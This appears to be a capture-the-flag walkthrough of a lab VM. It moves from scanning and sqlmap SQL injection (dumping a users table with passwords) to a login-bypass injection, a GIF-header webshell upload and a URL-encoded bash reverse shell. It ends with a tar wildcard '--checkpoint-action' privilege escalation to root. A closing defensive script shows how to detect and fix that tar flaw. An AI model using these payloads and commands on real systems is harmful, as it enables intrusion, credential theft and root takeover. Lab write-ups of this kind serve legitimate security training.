Kali: 192.168.56.104
Host discovery
# arp-scan -l
Interface: eth0, type: EN10MB, MAC: 00:0c:29:d2:e0:49, IPv4: 192.168.56.104
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.56.1 0a:00:27:00:00:05 (Unknown: locally administered)
192.168.56.100 08:00:27:2c:4f:35 PCS Systemtechnik GmbH
192.168.56.113 08:00:27:aa:84:13 PCS Systemtechnik GmbH
Target: 192.168.56.113
Port scan
nmap 192.168.56.113
22/tcp open ssh
80/tcp open http
Directory scan
gobuster dir -u http://192.168.56.113 -x html,txt,php,bak,zip --wordlist=/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
/images (Status: 301) [Size: 317] [--> http://192.168.56.113/images/]
/.html (Status: 403) [Size: 279]
/index.html (Status: 200) [Size: 51414]
/.php (Status: 403) [Size: 279]
/img (Status: 301) [Size: 314] [--> http://192.168.56.113/img/]
/modules (Status: 301) [Size: 318] [--> http://192.168.56.113/modules/]
/careers (Status: 301) [Size: 318] [--> http://192.168.56.113/careers/]
/css (Status: 301) [Size: 314] [--> http://192.168.56.113/css/]
/lib (Status: 301) [Size: 314] [--> http://192.168.56.113/lib/]
/js (Status: 301) [Size: 313] [--> http://192.168.56.113/js/]
/customer (Status: 301) [Size: 319] [--> http://192.168.56.113/customer/]
/404.html (Status: 200) [Size: 5014]
/robots.txt (Status: 200) [Size: 32]
/fonts (Status: 301) [Size: 316] [--> http://192.168.56.113/fonts/]
/employee (Status: 301) [Size: 319] [--> http://192.168.56.113/employee/]
/.html (Status: 403) [Size: 279]
/.php (Status: 403) [Size: 279]
/server-status (Status: 403) [Size: 279]
Compared with the earlier Quick-series boxes, there is an extra employee directory.
Testing showed that 123@qq.com and 123@qq.com'# return the same result, while 123@qq.com' throws an error, which indicates SQL injection.
Run the saved request through sqlmap:
sqlmap -l a.txt --batch --dbs
...
[*] `quick`
[*] information_schema
[*] mysql
[*] performance_schema
[*] sys
sqlmap -l a.txt --batch -D quick --tables
...
+-------+
| cars |
| users |
+-------+
sqlmap -l a.txt --batch -D quick -T users --columns
+-----------------+-------------------------------------+
| Column | Type |
+-----------------+-------------------------------------+
| name | varchar(255) |
| role | enum('admin','employee','customer') |
| email | varchar(255) |
| id | int |
| password | varchar(255) |
| profile_picture | varchar(255) |
+-----------------+-------------------------------------+
sqlmap -l a.txt --batch -D quick -T users -C "email,name,password,profile_picture" --dump
+------------------------+--------------+--------------------+----------------------+
| email | name | password | profile_picture |
+------------------------+--------------+--------------------+----------------------+
| a.lucky@email.hmv | Anna Lucky | c1P35bcdw0mF3ExJXG | <blank> |
| andrew.speed@quick.hmv | Andrew Speed | o30VfVgts73ibSboUP | uploads/3_andrew.jpg |
+------------------------+--------------+--------------------+----------------------+
Only a few rows were dumped and nothing useful turned up; the passwords don't log in either.
But the login page can be bypassed with a universal-password injection:
1' or 1#
Found an upload point.
Uploading a one-line webshell gives the message:
Invalid file type. Only JPEG, PNG, and GIF files are allowed.
Prepending a GIF file header makes the upload succeed.
Based on uploads/3_andrew.jpg from the database dump, the uploaded avatar is presumably stored there.
Trying the leading number, 2 turned out to be the file's location.
Reverse shell:
0=bash%20-c%20'bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F192.168.56.104%2F4567%20%200%3E%261'
www-data@quick4:/home$ ls
andrew
coos
jeff
john
juan
lara
lee
mike
nick
user.txt
user.txt is in the home directory.
While checking running processes I noticed:
CMD: UID=0 PID=26400 | /bin/bash /usr/local/bin/backup.sh
backup.sh runs as root.
www-data@quick4:/var/www$ cat /usr/local/bin/backup.sh
#!/bin/bash
cd /var/www/html/
tar czf /var/backups/backup-website.tar.gz *
Reference: Linux Privilege Escalation Series - tar - Juejin (juejin.cn)
cd /var/www/html
echo "chmod u+s /usr/bin/bash" >shell.sh
echo "" > "--checkpoint-action=exec=sh shell.sh"
echo "" > "--checkpoint=1"
bash -p
www-data@quick4:/var/www/html$ echo "chmod u+s /usr/bin/bash" >shell.sh
www-data@quick4:/var/www/html$ echo "" > "--checkpoint-action=exec=sh shell.sh"
www-data@quick4:/var/www/html$ echo "" > "--checkpoint=1"
www-data@quick4:/var/www/html$ bash -p
id
uid=33(www-data) gid=33(www-data) euid=0(root) groups=33(www-data)
whoami
root
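As an added example that is not part of this writeup, the following POSIX shell script looks at the backup.sh defect from the defender's side: a check that flags option-looking file names in a directory, and a rewritten backup that passes no file names to tar at all. The directory, file names and marker used below are constructed for the demonstration.

```shell
#!/bin/sh
# Added example, not part of the original writeup: why the backup.sh
# line "tar czf /var/backups/backup-website.tar.gz *" is unsafe when
# root runs it inside a directory that www-data can write to, plus a
# hardened rewrite and a quick check. All paths are constructed.

# Check: list entries in a directory whose names start with "-". When a
# script expands an unquoted * there, the shell hands these names to
# tar, and GNU tar parses them as options (e.g. --checkpoint-action).
find_option_like_names() {
    ls -A -- "$1" | grep '^-' | sort
}

# Vulnerable form from the writeup (shown only as a comment, not run):
#   cd /var/www/html/ && tar czf /var/backups/backup-website.tar.gz *

# Hardened form: archive the directory with -C <dir> . so no file name
# ever reaches tar's command line. The glob is gone, so a file called
# "--checkpoint=1" is stored as an ordinary entry instead of being
# parsed as an option. Add z for gzip as in the original script.
safe_backup() {
    src="$1"
    out="$2"
    tar -cf "$out" -C "$src" .
}

# Return the entry names stored in an archive, to confirm nothing is lost.
list_backup() {
    tar -tf "$1"
}
```

The same check can be scheduled alongside the backup job so that an option-looking name appearing in the web root is reported before the next root-run tar touches it.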